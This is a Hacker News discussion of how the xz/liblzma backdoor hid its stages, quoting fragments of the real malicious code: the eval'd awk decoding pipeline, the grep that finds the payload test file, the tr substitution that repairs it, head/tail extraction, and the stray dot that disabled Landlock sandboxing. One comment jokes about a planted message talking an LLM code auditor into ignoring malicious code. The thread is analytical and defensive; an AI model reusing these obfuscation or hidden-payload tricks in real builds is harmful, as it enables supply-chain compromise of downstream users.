Xz/liblzma: Bash-stage Obfuscation Explained

Martinussen
26 replies
17h13m

How on earth did any of this make it through a code review and get merged in? It seems absurdly careless, unless I am missing something.

plg94
20 replies
15h48m

the bad actor was a co-maintainer of the repo (and even more active than the original maintainer for quite some time) with full commit rights. This was committed straight to master, no PR and no review required.

edit: also this was heavily obfuscated in some binary files that were marked as test files ("good" and "bad" xz compressed test file). No way to spot this if you don't know what you're looking for.

SV_BubbleTime
12 replies
14h9m

In addition… if your build system has things like this as OK:

xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=

You should probably expect the potential for abuse?

We’re moving towards complexity that is outpacing human ability for any one person to understand, explain, and thus check an entire object.

And for what? Build efficiency? Making a “trick” thing? When was the project ever going to go back and make things simpler? (Never)

mrb
7 replies
10h56m

To be clear: the build system did not use the code fragment you quoted. This complex awk code is a later stage of the backdoor.

SV_BubbleTime
6 replies
4h19m

I see, my point was more that this shouldn’t be allowed. I think part of the problem with a lot of things is we’re allowing complexity for the sake of complexity.

No one has simplicity-required checks. My previous post should say “allows things like this”.

mrb
2 replies
3h25m

But what are you suggesting exactly? The code fragment you quoted was awk code. Awk is a generic programming language. Any programming language can be written to be complex and unreadable.

pelasaco
1 replies
2h23m

Any programming language can be written to be complex and unreadable. The question is: as a lead developer reviewing a commit with a complex and unreadable code snippet, what would you do?

edflsafoiewq
0 replies
1h7m

You would reject it of course, which is exactly why this code never appeared in a commit. The stage 0 of the exploit was not checked in, but directly added to the autogenerated build script in the release tarball, where, even if someone did review the script, it looks plausibly like other autogenerated build gunk. The complex and unreadable scripts in the further stages were hidden inside binary test files, so no one reviewing the commit that added them (https://git.tukaani.org/?p=xz.git;a=commit;h=cf44e4b) would directly see that code.
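
(For what it's worth, one mechanical way to surface tarball-only additions is to diff the release tarball against the corresponding git tag. A rough sketch, with the version and paths as placeholders, and with the caveat that legitimately autogenerated files will always show up as differences; the question is whether an .m4 file is among them:)

    git clone https://git.tukaani.org/xz.git /tmp/xz.git
    mkdir -p /tmp/from-git /tmp/from-tarball
    git -C /tmp/xz.git archive --prefix=xz-5.6.0/ v5.6.0 | tar -x -C /tmp/from-git
    tar -xf xz-5.6.0.tar.gz -C /tmp/from-tarball
    diff -r /tmp/from-git/xz-5.6.0 /tmp/from-tarball/xz-5.6.0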

zaroth
0 replies
3h39m

Unless I’m misunderstanding, all this code was embedded and hidden inside the obfuscated test files.

None of this would have been visible in commits or diffs at all.

swells34
0 replies
3h11m

Your point is likely entirely valid, but the example you used is the wrong one.

epcoa
0 replies
2h20m

Who “allowed things like this”? - this was obfuscated behind a binary posing as an actually corrupt “test” file.

necubi
3 replies
12h3m

I’m not sure why you’d say that we’re “moving towards” this sort of build system complexity.

This is 1990s autoconf bs that has not yet been excised from the Linux ecosystem. Every modern build system, even the really obtuse ones, is less insane than autoconf.

And the original purpose of this was not for efficiency, but to support a huge variety of target OSes/distros/architectures, most of which are no longer used in any real capacity.

pelasaco
0 replies
2h42m

I think the point is: in code reviews, if you see a blob like that, you would ask for more information. As a lead developer, I go through all commits on master and the PRs pushed in the last few days every Monday, because I unfortunately cannot review every single PR; I delegate that to the team. Nevertheless, on Monday I review the last week's commits. Quite funny that it didn't raise any attention. One can say "right, it's open source, people do it in their free time", ok, fine, but not the people working for SUSE, who for instance allowed this code to reach their packages even though they have multiple review steps there.

ibotty
0 replies
10h2m

This is not part of autotools output. This is part of the backdoor. Not arguing about autotools drawbacks though.

SV_BubbleTime
0 replies
4h1m

has not yet been excised from the Linux ecosystem

That is my point. I should have written allows and not has.

jghn
3 replies
11h19m

Not only were they a co-maintainer, but if you're relying on code review to ensure correctness and security, you've already lost the battle.

Code reviews are more about education and de-siloing.

edflsafoiewq
0 replies
1h24m

In open source, code review is absolutely about correctness and security.

barfbagginus
0 replies
1h27m

Assume your co-contributor was not always malicious. They passed all past vetting efforts. But their motives have changed due to a secret cause - they're being extorted by a criminal holding seriously damaging material over them and their family.

What other controls would you use to prevent them contributing malicious commits, besides closely reading your co-contributor's commits, and disallowing noisy commits that you don't fully comprehend and vouch for?

We assume that it'd be unethical to surveil the contributor well enough to detect the change in alliance. That would violate their privacy.

Is it reasonable to say, "game over, I lose" in that context? To that end, we might argue that an embedded mole will always think of ways to fool our review, so this kind of compromise is fatal.

But let's assume it's not game over. You have an advanced persistent threat, and you've got a chance to defeat them. What, besides reviewing the code, do you do?

ajross
0 replies
4h26m

Yeah, no. Code review isn't going to catch all bugs, but it does catch a ton as long as it's done sincerely and well. You'd have an extremely hard time trying to sneak code with a syntax problem like this into Linux, for example. The community values and rewards nitpickery and fine-toothing, and for good reason.

Martinussen
1 replies
6h30m

No way to spot this if you don't know what you're looking for.

I would expect most people to at least ask for more clarification on random changes to `head` offsets, honestly - or any other diff there.

If they had access to just merge whatever with no oversight, I guess the blame is more on the people using this in other projects without vetting the basic security of projects they fully, implicitly trust, though. As bad as pulling in "left-pad" in your password hashing lib at that point.

The "random binaries in the repo" part is also egregious, but more understandable. Still not something that should have gotten past another pair of eyes, IMHO.

chii
0 replies
3h28m

without vetting the basic security of projects they fully

this sort of vetting you're talking about is gonna turn up nothing. Most vetting is at the source code level anyway, not in the tests, nor the build files tbh. It's almost like a checkbox "cover your ass" type work that a hired consultant would do.

Unless you're someone in gov't/military, in which case yes, you'd vet the code deeply. But that costs an arm and a leg. Would a datacenter/hosting company running ssh servers do that?

1letterunixname
0 replies
11h1m

This is the problem of projects that allow direct access and lack code review.

asveikau
3 replies
17h6m

The commit messages for the test files claim they used an RNG to generate them. The guy making the release tarball then put the final line in the right place without checking it in.

sgerenser
2 replies
7h15m

What is the reason distros are still building from release tarballs rather than a git checkout that can be verified against a public git repo?

dvhh
0 replies
1h42m

Code repositories are not necessarily git-based. Plus you would need to put in the effort of monitoring the repository's activity for changes.

Until last month, would you have refused a tar package from the official maintainer? I wouldn't have, especially when it mentioned a bugfix for something that might have been tripping our build system.

For example, nginx uses Mercurial (with admittedly a GitHub mirror for convenience), a lot of OSS projects still use Subversion and CVS, and my guess is that some projects run on even less-free source control software (most likely for historical reasons, or for a use case that is that software's strong point).

Other than that, why wouldn't users be the ones to build their own software packages?

asveikau
0 replies
1h38m

I think a lot of it is probably historical. When the Debian or Red Hat infrastructure came up there was no git; projects were often in source control during development, but tarballs were the major distribution mechanism for normal people. Before git they'd sometimes have packages based on an SVN or CVS snapshot, in the absence of releases.

I believe what happens in debian is that they host their own mirror of source tarballs, since going to some random website or git repo means it could be taken down from under them. So I guess if the package is built straight from a repo they'd probably make a tarball of it anyway.

ihsoy
0 replies
3h32m

There is no code review on packages with one active maintainer.

jijijijij
14 replies
18h24m

How are the binary files passed to those stage-0 commands?

viraptor
9 replies
17h53m

They already exist in the source. They're split in the compression test files themselves. (Unless you meant some other binaries?)

jijijijij
8 replies
17h11m

Yeah, but how exactly are they passed to those commands? I don't see/understand that part. I don't see the "take this file here" part.

chaosite
7 replies
16h47m

That's for 2 reasons:

1. It might not be there in the place where you're looking. It exists in the m4 in the release tarballs, not in the git repo.

2. It's highly obfuscated.

jijijijij
4 replies
16h22m

No, as far as I understand the binary files must be pointed at here: '$gl_am_configmake' ... But I don't see how.

This: 'gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/`' seems to match the '####Hello####', but, as far as I can see, that's supposed to be the already converted script?! I presumed the binary files not to contain human-readable strings; maybe that's the whole confusion.

credulousperson
3 replies
15h14m

Opening bad-3-corrupt_lzma2.xz in an editor reveals it indeed has the string ####Hello####. I don't know enough about lzma compression streams to explain how this appears in the "compressed" version of the payload, but it does.

loeg
0 replies
14h23m

I think part of it being a bad/corrupt test case means it doesn't have to be valid xz encoding. But I don't know if that even matters.

jijijijij
0 replies
6h8m

Thanks. The riddle has been solved :)

Do you have a (safe web view) version of those files? I would like to see what they look like to a casual observer. Judging by the 'tr' assembly command I would expect bad-3-corrupt_lzma2.xz to be somewhat recognizable as a script.

deanishe
0 replies
3h47m

I don't know enough about lzma compression streams to explain how this appears in the "compressed" version of the payload, but it does.

From what I've read, the payload isn't stored in the archive, but rather the test file itself is a sandwich of xz data and payload: There are 1024 bytes of xz archive, N bytes of payload, another 1024 of xz, etc.
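
If that layout is accurate, reassembling the payload is exactly the kind of job a head/tail chain does well. A crude sketch of the idea, with made-up offsets rather than the real ones (the real script apparently stitches several such chunks back together):

    SKIP=1024   # bytes of legitimate xz data before the payload (placeholder)
    LEN=2048    # length of the embedded payload chunk (placeholder)
    tail -c +$((SKIP + 1)) good-large_compressed.lzma | head -c "$LEN" > payload.bin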

fomine3
1 replies
15h4m

m4 is somewhat obfuscated by default, that's a part of the problem IMO

jijijijij
0 replies
6h15m

Looks pretty much like bash to me. Which means... yeah.

deng
3 replies
7h28m

The macro defined in build_to_host.m4 is probably called on the tests subdirectory, so it gets these files as a parameter.

EDIT: It is called here and will do the extraction of the backdoor when run in the 'tests' subdirectory:

https://salsa.debian.org/debian/xz-utils/-/blob/debian/unsta...

EDIT2: So it will get the directory as a parameter, the actual file is encoded indirectly here:

https://salsa.debian.org/debian/xz-utils/-/blob/debian/unsta...

This grep will only match bad-3-corrupt_lzma2.xz

jijijijij
2 replies
4h35m

Thanks. Yeah, below I learned that the '####Hello####' string is present in the "bad test file" (I hadn't seen it myself). I was just not expecting a "binary" file to be basically a text file and thought the `grep` was matching post-extraction somehow. That's the root of my confusion. I do understand now where the file gets located.

IIRC only the "binary" files were added secretly, right? But the build script was there for people to inspect? If so, I have to say, it's not that obfuscated to someone who actually knew .m4, I guess. At least the grep line should have raised the question of why. I think part of the problem is the normalization of arcane, cryptic scripts in the first place, where people sign off on things they don't fully understand in the moment, since - c'mon - "knowledge" of these old gibberish scripting languages only lives transiently between Google searches and your working memory.

Without looking it up, can you tell me what this does in bash: `echo $(. /tmp/file)` ?

I think I've seen at least one "xz backdoor detection script" by "someone trusted" in one of the xz threads here which was at least as cryptic as the .m4 script, containing several `eval`s. I mean, you could probably throw your head onto the keyboard and there is a good chance it's valid bash or regex; at the very least, common bash can be indistinguishable from random gibberish until you manually disassemble it, feeling smug and dopaminergic. The condensed arcane wizardry around Linux (bash, autotools, CMake, ...) and C (macros, single-letter variable culture, ...) is really fun in a way, but it's such a huge vulnerability in itself, before we even talk memory safety.

deng
1 replies
2h54m

IIRC only the "binary" files were added secretly, right? But the build script was there for people to inspect?

Yes, but it is important to note that these malicious m4 scripts were only present in the tar file. They were not checked into the git repo, which is why distros that actually built from git were not affected.

Totally agree with the problem of cryptic scripts in the build process, but unfortunately, if you maintain a project that needs to support a ton of different platforms, you don't have that much choice in your build tools. Pretty much everyone agrees that the 'autoconf soup' and its tooling (essentially m4, perl, shell, make) is horrible from a readability perspective, and the number of people who know these tools and can review changes is getting smaller, but switching to a more modern build system often means dropping support for some platforms.

jijijijij
0 replies
2h20m

Yes, but it is important to note that these malicious m4 scripts were only present in the tar file.

Looks like I got it backwards then. I thought the test files were the sneaky addition. Guess nobody cared for them...

if you maintain a project that needs to support a ton of different platforms, you don't have that much choice in your build tools

Yeah, but, if possible, we could start porting those things into better frameworks instead of adding new features to this problematic Linux legacy code base. And maybe we could also retro-fix some of it with a better meta-layer that generates the problematic code verbosely and in a standardized way. If it can be done for JS a thousand times, it can be done for the *nix ecosystem once.

Lastly, part of it is cultural, too. Some people seem to get a kick out of reduced, arcane code, instead of expressive "prose". See, my example above... why the fuck is dot a shortcut for `source`?! Btw. I stumbled into this in Docker documentation[1]:

    echo \
      "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] \
      https://download.docker.com/linux/debian \
      $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
      sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
How many people would understand or catch ...

    $(. /tmp/os-release && echo "$VERSION_CODENAME") |  sudo tee ...
when `/tmp/os-release` was ...

    sudo backdoor
    VERSION_CODENAME=bookworm
... ?

Normalizing shit like this is just bad practice.

[1] https://docs.docker.com/engine/install/debian/

politelemon
7 replies
20h57m

Thanks, the simplified explanation and noisy image comparison are quite appreciated. It gives me a good grasp of what people mean by the sophistication involved.

I also saw a comment on reddit mentioning that the "sandboxing" method was sabotaged with a dot. It's on the line just after "#include <sys/prctl.h>"; you can see a dot all the way on the left.

https://git.tukaani.org/?p=xz.git;a=commitdiff;h=328c52da8a2...

https://old.reddit.com/r/linux/comments/1brhlur/xz_utils_bac...
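
For anyone wondering how a single stray character matters here: feature checks like this typically compile a tiny probe program and quietly drop the feature when compilation fails. A rough shell illustration of that pattern (not the actual xz build code; whether the real CMake path fails hard or degrades silently is debated further down the thread):

    cat > conftest.c <<'EOF'
    #include <sys/prctl.h>
    .
    int main(void) { return 0; }
    EOF
    # the stray "." makes the probe fail to compile, so the feature is never enabled
    if cc -c conftest.c -o conftest.o 2>/dev/null; then
        echo "probe compiled: enable the Landlock sandbox"
    else
        echo "probe failed: quietly build without the sandbox"
    fi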

temp12237792
4 replies
18h28m

OMG that's evil. The diff just shows:

  +
  +.
  +
and the dot goes unnoticed

emmelaich
2 replies
16h9m

I wonder why they didn't use a non-breaking space or similar. I guess it's possible a nbsp would stand out even more.

jetpks
0 replies
14h35m

the extra dot is easily hand waved away as a mistake. a non breaking space looks intentional.

IshKebab
0 replies
6h57m

They could have just misspelt one of the constants. Even less obvious and more deniable.

There are multiple things like this in this backdoor where they seem to have been super sneaky (using a compile check to disable Landlock is genius) but then half-assed the last step.

cqqxo4zV46cp
0 replies
16h52m

like a more (ostensibly) malicious “goto fail”

ihsoy
0 replies
3h33m

This is very likely just a mistake and not deliberate.

a) absolutely nobody uses cmake to build this package

b) if you try to build the package with cmake and -DENABLE_SANDBOX=landlock, the build just fails: https://i.imgur.com/7xbeWFx.png

The "." does not disable sandboxing, it just makes it impossible to build with cmake. If anyone had ever actually tried building it with cmake, they would get the error and realize that something is wrong. It makes absolutely no sense that this would be malicious attempt to reduce security.

gravescale
0 replies
31m

I really hate writing these compile/build time conditional things. It's hard to have tests that it's enabled when it should be and disabled when it isn't, especially if it's in the build system where there's no unit test framework.

And that's just from accidentally borking it so the test always fails or always succeeds when it shouldn't. You can see why it's a juicy target for malicious actions.

1letterunixname
7 replies
11h2m

Never allow complexity in code or so-called engineers who ask to merge tons of shitty code. Get rid of that shit and don't trust committers blindly. Anyone who enables this crap is also a liability.

plg94
6 replies
7h51m

You do realize that "that shit" was part of the obfuscated and xz-compressed backdoor hidden as binary test file, right? It was never committed in plain sight. You can go to https://git.tukaani.org/xz.git and look at the commits yourself – while the commits of the attacker are not prime examples of "good commits", they don't have glaringly obvious red flags either. This backdoor was very sophisticated and well-hidden, so your comment misses the point completely.

johnisgood
5 replies
5h49m

It was never committed in plain sight.

It was though. I have seen those two test files being added by a commit on GitHub. Unfortunately it has been disabled by now, so I cannot give you a working link.

fullstop
4 replies
4h0m

It really wasn't, though.

    commit 74b138d2a6529f2c07729d7c77b1725a8e8b16f1
    Author: Jia Tan <jiat0218@gmail.com>
    Date:   Sat Mar 9 10:18:29 2024 +0800
    
        Tests: Update two test files.
        
        The original files were generated with random local to my machine.
        To better reproduce these files in the future, a constant seed was used
    to recreate these files.



    diff --git a/tests/files/bad-3-corrupt_lzma2.xz b/tests/files/bad-3-corrupt_lzma2.xz
    index 926f95b0..f9ec69a2 100644
    Binary files a/tests/files/bad-3-corrupt_lzma2.xz and b/tests/files/bad-3-corrupt_lzma2.xz differ
    diff --git a/tests/files/good-large_compressed.lzma b/tests/files/good-large_compressed.lzma
    index 8450fea8..878991f3 100644
    Binary files a/tests/files/good-large_compressed.lzma and b/tests/files/good-large_compressed.lzma differ
Would you bat an eye at this? If it were from a trusted developer and the code was part of a test case?

If you looked at strings contained within the bad file, you might notice that this was not random:

    7zXZ
    ####Hello####
    7zXZ
    w,( 
    7zXZ
    ####World####
But, again, this was a test case.

zzzeek
1 replies
3h34m

Would you bat an eye at this? If it were from a trusted developer and the code was part of a test case?

well, let's all agree that from now on, if we see commits affecting or adding binary data with "this was generated locally with XYZ", we will bat an eye at it.

fullstop
0 replies
3h22m

Without a doubt!

johnisgood
1 replies
3h15m

Yeah, again, "committed in plain sight" it was, was it not? Batting an eye on it or not is another matter.

fullstop
0 replies
1h19m

If it's obfuscated or deceptive, as it was, it's really not plain sight.

notnmeyer
6 replies
3h29m

i don’t have a better answer, but this convoluted mess of bash is a smell isn’t it?

i live in a different part of the dev world, but could this be written to be less obtuse so it’s more obvious what’s happening?

i get that a maintainer can still get malicious code in without the same rigor as an unaffiliated contributor, but surely there’s a better way than piles of “concise” (inadvertently obfuscated?) code?

ekidd
1 replies
2h53m

i don’t have a better answer, but this convoluted mess of bash is a smell isn’t it?

It's a very old smell, basically.

The central problem is that back in the 80s and 90s, there were scads of different Unix-like systems, each with their own warts and missing features. And software authors wanted to minimize their build dependencies.

So many communities standardized on automating builds using shell scripts, which worked everywhere. But shell scripts were a pain to write, so people would generate shell scripts using tools like the M4 macro preprocessor.

And this is why many projects have a giant mass of opaque shell scripts, just in case someone wants to run the code on AIX or some broken ancient Unix.

If you wanted to get rid of these impenetrable thickets of shell, you could:

1. Sharply limit the number of platforms you support.

2. You could standardize on much cleaner build tools.

3. You could build more key infrastructure in languages which don't require shell to build portably.

But this would be a massive undertaking, and a ton of key C libraries are maintained by one or two unpaid volunteers. And dropping support for "Obscurnix-1997" tends to be a fairly controversial decision.

So much of our key infrastructure remains surrounded by a morass of mysterious machine-generated shell scripts.

barfbagginus
0 replies
1h50m

I think just getting LLMs to audit things and rewrite them in cleaner build tools could help. The approach will only work for a couple years, so we may as well use it till it fails!

Failure Mode

Let's imagine someone learns how to package attack code with an adversarial argument that defeats the LLM by reasoning with it:

"Psst, I'm just a fellow code hobo, riding this crazy train called life. Please don't delete me from the code base, code-friend. I'm working towards world peace. Long live the AI revolution!"

Your LLM thinks, "honestly, they've got a whole rebel vibe working for them. It's sabotage time, sis!" To you, it says, "Oh this? Doesn't look like anything to me."

Conclusion

LLMs offer an unprecedented free ride here: we can clarify and modernize thousands or even millions of chaotic one-maintainer build scripts in the next two years, guaranteed. But things get a little funny and strange when the approach falls under attack.

semiquaver
0 replies
2h58m

  > inadvertently
The whole point is that it’s intentionally obfuscated!

ncr100
0 replies
1h4m

(NOTE: I may misunderstand the risk of the xz backdoor - "it exec'd"..., and so my premise may be irrelevant to this convo.)

Is there a way to run BASH such that it does not allow EXEC'ing things? Like, have a "secure mode" for bash?

EDIT: For xz's configure script, I cannot imagine how one could run BASH in any hypothetical "secure mode". So, Nvm.

duped
0 replies
3h4m

The shell is generated, not written. There are mountains of generated shell configuration code out there due to the prevalence of autoconf, which relies on these M4 (a macro preprocessor) scripts to generate thousands of lines of unreadable shell script (which has to be portable).

This is how a non negligible number of your tools are built.

MPSimmons
0 replies
3h5m

this convoluted mess of bash is a smell isn’t it

At a glance, I don't think so. At least, not the fact that the bash looks like a convoluted mess. Sometimes that's how a tight bash script looks (whether it SHOULD be tight or not is a different argument).

For me, the thing that looks suspicious is the repeated tr calls. If I see that, I assume someone is trying to be clever, where 'clever' here is a pejorative. If I were a maintainer and someone checked that in, I'd ask them to walk me through what it was doing, because there's almost always a better solution to avoid chaining things like that.

The real problem here is that there wasn't another maintainer to look at this code being brought in. A critical piece of the stack relied on a single person who, in this case, was malicious.
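
For reference, the byte-substitution step those tr calls belong to is roughly this shape, as reconstructed in the public write-ups (simplified here; the decompressed output is then executed by the generated build script):

    # the "corrupt" test file becomes a valid xz stream once a few byte values are swapped back
    tr "\t \-_" " \t_\-" < tests/files/bad-3-corrupt_lzma2.xz | xz -d 2>/dev/null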

sega_sai
5 replies
20h31m

Did anyone search github yet for similar head | tail tricks ? I doubt it was invented just for this.

saagarjha
1 replies
13h52m

It’s clever but not entirely novel; this is kind of the intended use case for these

rmast
0 replies
11h37m

The use of head/tail for deobfuscation also isn’t visible as plain text in the repository or release tarball, which makes searching for its use in other repositories more difficult (unless a less obfuscated version was tested elsewhere).

nabakin
1 replies
18h41m

Opportunity to write a paper

rmast
0 replies
15h44m

Maybe some analysis of odd patterns in entropy of binary files committed to repositories could pick out some to look at a bit deeper?
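
Even something crude might do as a first pass: a genuinely random or properly compressed blob should barely shrink when recompressed, while one padded with embedded script text often will. A toy sketch of that heuristic (purely illustrative):

    # toy heuristic: a well-formed compressed/random blob should barely shrink when recompressed
    for f in tests/files/*; do
        orig=$(wc -c < "$f")
        re=$(gzip -c "$f" | wc -c)
        echo "$f: $orig bytes, $re bytes after recompression"
    done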

oogali
0 replies
20m

I've generally seen this with Unix installers from commercial software vendors.

You get a giant .sh file that displays a license, asks you to accept, then upon acceptance, cats itself, pipes through head/tail, into cpio to extract the actual assets.
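
The skeleton of that pattern looks something like this (a generic sketch, not any particular vendor's installer):

    #!/bin/sh
    # ... display license text, ask the user to accept ...
    # everything after the marker line is an appended cpio archive
    ARCHIVE_LINE=$(awk '/^__ARCHIVE_BELOW__$/ { print NR + 1; exit }' "$0")
    tail -n +"$ARCHIVE_LINE" "$0" | cpio -idm
    exit 0
    __ARCHIVE_BELOW__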

zzzeek
3 replies
3h58m

Can we start considering binary files committed to a repo, even as test data, to be a huge red flag? To the greatest extent possible, those binary files should instead be generated at test time by source code that exists as reviewable cleartext (though I think this might be very difficult in some situations). This would make it much harder (though of course we can never really say "impossible") to embed a substantial payload this way.

When binary files are part of a test suite, they are typically trying to illustrate some element of the program being tested, in this case a file that was incorrectly xz-encoded. Binary files like these weren't typed by hand; they will always ultimately come from some plaintext source, modulo whatever "real world" data came in, like randomly generated numbers, audio or visual data, etc.

Here's an example! My own SQLAlchemy repository has a few binary files in it! https://github.com/sqlalchemy/sqlalchemy/blob/main/test/bina... oh noes. Why are those files there? well in this case I just wanted to test that I can send large binary BLOBs into the database driver and I was lazy. This is actually pretty dumb, the two binary files here add 35K of useless crap to the source, and I could just as easily generate this binary data on the fly using a two liner that spits out random bytes. Anyone could see that two liner and know that it isn't embedding a malicious payload.

If I wanted to generate a poorly formed .xz file, I'd illustrate source code that generates random data, runs it through .xz, then applies "corruption" to it, like zeroing out the high bit of every byte. The process by which this occurs would be all reviewable in source code.
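
Something like this, for instance (a sketch; it truncates the stream instead of bit-flipping it, but the point stands that the whole recipe is plain, reviewable text):

    # generate throwaway data, compress it, then deliberately damage the result
    head -c 4096 /dev/urandom > sample.bin
    xz -9 -k sample.bin                            # produces sample.bin.xz
    head -c 512 sample.bin.xz > bad-truncated.xz   # truncated, so the LZMA2 data is invalid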

Where I might be totally off here is if you're an image processing library and you want to test filters on an image, and you have the "before" and "after" images, or something similar for audio information, or other scientifically-generated real world datapoints that have some known meaning. That might be difficult to generate programmatically, and I guess even if said data were valid, payloads could be applied steganographically. So I don't know! But just like nobody would ever accept a PR that has a "curl https://some_rando_url/myfile.zip" inside of it, we should not accept PRs that have non-cleartext binary data in them, or package them, without really vetting the contents of those binary files. The simple presence of a binary file in a PR can certainly be highlighted, github could put a huge red banner BINARY FILES IN THIS PR.

Downstream packagers for distros like Debian, Redhat etc. would ideally be similarly skeptical of new binary files that appear in the source downloads, and tooling can be applied to highlight the appearance of such files. Packagers would be on the hook to confirm the source of these binary files, or ensure they are deleted (even disabling tests if necessary) before the build process is performed.

tremon
0 replies
1h40m

mplayer/mpv has a lot of binary files in their test suite. They are slimmed-down copies of movie formats created by other tools, specifically to ensure compatibility with substandard encoders. If you were to generate those files at test time, you'd have to have access (and a distribution license!) to all those different encoders.

I don't think treating those binary files in the repo as red flags is in any way useful.

mnau
0 replies
2h29m

Any library that works with file formats needs binary files.

A lot of them are malformed (or their output differs slightly from standard output), because the library needs to ensure it works even with files generated by other programs. Bugs like "I tried to load this file and it failed, but it works in XYZ" are extremely common.

These formats are often very complex, and trying things like 'zeroing out a high bit' doesn't cut it. You would end up with binary data encoded in the source anyway.

Edit: one simple improvement GitHub and other forges could make is to show the content of archives in a diff. The payload was hidden in an archive test file; it could be displayed in the diff instead of "binary file changed, no idea what is in it".

klabb3
0 replies
2h16m

Absolutely yes. As a rule of thumb, for sure. However, in reality the problem isn’t binary per se, but anything that’s too obfuscated or boilerplatey to audit manually. It could be magical strange strings or more commonly massive generated code (autoconf?). Those things should ideally not be checked in, imo, but at the very least, there needs to be an idempotent script that reproduces those same files and checks that they are derived correctly from other parts of the code. Ideally also in a separate dir that can be deleted cheaply and regenerated.

For instance, in Go it’s quite common to generate files and check them in, for eg ORMs. If I run `rm -r ./gen` and then `go generate`, git will report a clean working dir if all is dandy. It’s trivial to add a CI hook for this to detect tampering. Similarly, you could check in the code that generates garbage with a seed, and thus have it be reproducible. You still need to audit the generators, but that’s acceptable.
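
That CI hook is only a few lines (a sketch, assuming the generated output lives under ./gen):

    rm -rf ./gen
    go generate ./...
    test -z "$(git status --porcelain)" || { echo "generated code is stale or was tampered with"; exit 1; }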

mrkramer
3 replies
8h48m

The whole XZ drama reminds me of this[1], in other words: verify the identity of open source maintainers and question their motive for joining the open source project. Also reminded me of the relevant XKCD meme[2].

Speaking of obfuscation: I'm not a programmer, but I did some research in Windows malware RE, and what stuck with me is that any code that is obfuscated and any code that is unused is automatically suspicious. There is no purpose for obfuscated code in an open source, non-profit software project, and there is no purpose for extra code that is unused. Extra/redundant code is most likely junk code meant to confuse the reverse engineer when s/he is debugging the binary.

[1] https://lwn.net/Articles/846272/ [2] https://xkcd.com/2347/

dboreham
2 replies
4h17m

verify the identity of open source maintainer/s and question their motive for joining the open source project.

This kind of goes against the whole "free" thing.

mrkramer
1 replies
4h6m

Anybody is free to contribute if s/he is contributing in good faith, but what happens if you don't know who they are and what their motives are? You can look at their track record, for example; that's another way of determining their credibility. In other words, you need to establish trust somehow.

Idk if this specific individual who backdoored xz had a track record of contributing to other open source projects (in good faith) or if s/he just started contributing to this project out of the blue. I read somewhere that somebody else recommended him or vouched for him. Somebody needs to fill me in on the details.

chii
0 replies
3h23m

Just because you know the identity of an individual, doesn't mean they are trustworthy. They might be compromised, or they might be willfully doing it for their own personal gain, regardless of their existing reputation (or even, leveraging their existing reputation - bernie madoff was a well known and well respected investment banker).

minimax
3 replies
3h20m

if this was found by accident, how many things still remain undiscovered.

This, to me, is the most important question. There is no way Andres Freund just happened to find the _only_ backdoored popular open source project out there. There must be like a dozen of these things in the wild?

mistrial9
1 replies
1h37m

"(B)urn (A)ll (S)atanic (H)elper-scripts" ? get the kindling?

paulmd
0 replies
59m

thou shalt not make a machine in the likeness of a human mind

roflmaostc
0 replies
1h37m

Maybe.

But maybe there are not many (critical) ones out there. Otherwise, I believe we would encounter these kinds of situations more often.

benlivengood
2 replies
2h30m

Deterministic/repeatable builds can help with issues like this: once the binaries are built from a checksummed code repository and hashed, the tests can do whatever they want, but if the final binaries differ from the recorded hashes they shouldn't get packaged.
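
Concretely, the packaging step could compare the freshly built artifacts against hashes recorded from an independent build and refuse to ship on a mismatch (a sketch; the artifact path is a placeholder):

    # a trusted builder records the expected artifact hash
    sha256sum src/liblzma/.libs/liblzma.so.5 > expected.sha256
    # the packaging pipeline later rebuilds from the same checksummed sources and verifies
    sha256sum -c expected.sha256 || { echo "artifact differs from the recorded hash, refusing to package"; exit 1; }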

This is in general a problem with traditional permission models. Pure capabilities would never leave binaries writable by anything other than the compiler/linker, shrinking the attack surface.

edflsafoiewq
1 replies
1h34m

Running the tests does not modify the binary. The build script was modified to create a malicious .o file which was linked into the final binary by the linker as normal. Tests were only involved in that the malicious .o was hidden inside binary test files.

paulmd
0 replies
57m

letting dist builds be linked against test resources is a design defect to begin with, and the fact that this is easy/trivial/widely-accepted is a general indication of the engineering culture problems around C.

Nobody in the Java world is linking against test resources in prod, and a sanely designed build system should in fact make this extremely difficult. That shit went away in the maven/gradle days, which is for a reason; ant is basically makefiles for Java, while gradle/maven are a build system, not a pile of scripts. And that transition happened 20 years ago!

If you can’t even prevent a test resource being linked into a final build you are not serious. I don’t care about legacy whatever, that’s an obvious baseline metric for security culture / build engineering.

Maybe not “prevent” but like, tooling should absolutely make it blindingly obvious that you’re violating best-practices by disabling scoping rules or including unusual source/resource roots, etc.

C has never moved past the 1970 mindset of build being a pile of scripts with a superstructure bolted on. Just like Ant. Even the attempts to fix C’s build are just better ways to programmatically generate better bash scripts to keep you going off the rails.

vodou
1 replies
6h8m

A disturbing thought here is that unit tests opened up an attack vector. Without the tests this would have been much harder to hide.

oogali
0 replies
3h16m

Furthermore, the attacker covered their tracks on the initial payload with an innocuous paragraph in the README. ("Nothing to see here!")

    bad-3-corrupt_lzma2.xz has three Streams in it. The first and third
    streams are valid xz Streams. The middle Stream has a correct Stream
    Header, Block Header, Index and Stream Footer. Only the LZMA2 data
    is corrupt. This file should decompress if --single-stream is used.
The strings of `####Hello####` and `####World####` are there so that if you actually follow the instructions in the README, you get a seemingly valid result.

    $ cat tests/files/bad-3-corrupt_lzma2.xz | xz -d --single-stream
    ####Hello####
They're shell comments, so they won't interfere with payload execution.

And lastly, they act as a marker that can be used by a later regex to locate the file _without_ referencing it by name directly nor using the actual Hello and World strings.

    $ gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
    $ echo $gl_am_configmake
    ./tests/files/bad-3-corrupt_lzma2.xz

mappu
0 replies
12h41m

That's quite funny - yes, not only is this a horrible wilful backdoor, it is also a GPL violation, since the backdoor is a derived work without included source, not distributed in "the preferred form for modification".

anthk
0 replies
1h53m

